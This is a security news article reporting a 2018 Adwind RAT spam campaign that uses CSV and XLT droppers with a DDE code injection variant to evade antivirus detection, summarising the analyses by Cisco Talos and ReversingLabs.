Security researchers have discovered a new Adwind RAT campaign targeting Windows, Linux and Mac users
Security researchers have discovered a new Adwind RAT campaign targeting Windows, Linux and Mac users. The campaign has been active since August 26, 2018, and was discovered by security researchers at ReversingLabs and Cisco Talos. According to researchers, the new spam campaign is spreading the Adwind 3.0 remote access tool (RAT), and the new version appears to be a variant of the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel. The new variant is also capable of avoiding detection of anti-malware software. Attackers used two different droppers in this campaign. They use either the .csv or .xlt extensions that are opened by default by Microsoft Excel. Both versions leverage a new variant to the DDE code injection attack. Even though this method is well-known, this variant is still undetected. The dropper file has a total of 35 extensions, but Microsoft Excel opens not all of them by default. The attacker uses a script starting Excel with a file with one of these extensions as a parameter for non-default extensions. “Formats like CSV doesn't have a predefined header, thus it can contain any kind of data at the beginning. Having random data like in the samples we found my trick the anti-virus into skip the file scanning. Other formats may be considered corrupted, as they might not follow the expected format.” said in the analysis published Cisco Talos researchers. Excel will display warnings to users regarding the execution of code. The first warning will be shown when excel recognise the opened file is not a real XLT document and shows that file may be corrupted and asks the user whether they want to open the file. The second warning shows the user that the document will execute the application "CMD.exe." If the user accepts all the warnings and the application will be executed. Researchers said the injected code will create and execute a VBScript. The VBScript uses bitasdmin, which is a tool provided by Microsoft to download or upload jobs and monitor their progress, to get the final payload which is a Java archive file. “The DDE variant used by the droppers in this campaign is a good example of how signature-based antivirus software can be tricked. It is also a warning sign regarding file extension-scanning configurations. This kind of injection has been known for years, however, this actor found a way to modify it in order to have an extremely low detection ratio. “ For more details, you can visit analysis published by Cisco Talos here and the analysis published by ReversingLabs here. For the latest cyber threats and the latest hacking news please follow us on Facebook and Twitter.
You may be interested in reading:New Bug Crashes Mozilla Firefox on Windows, Linux, and Mac Systems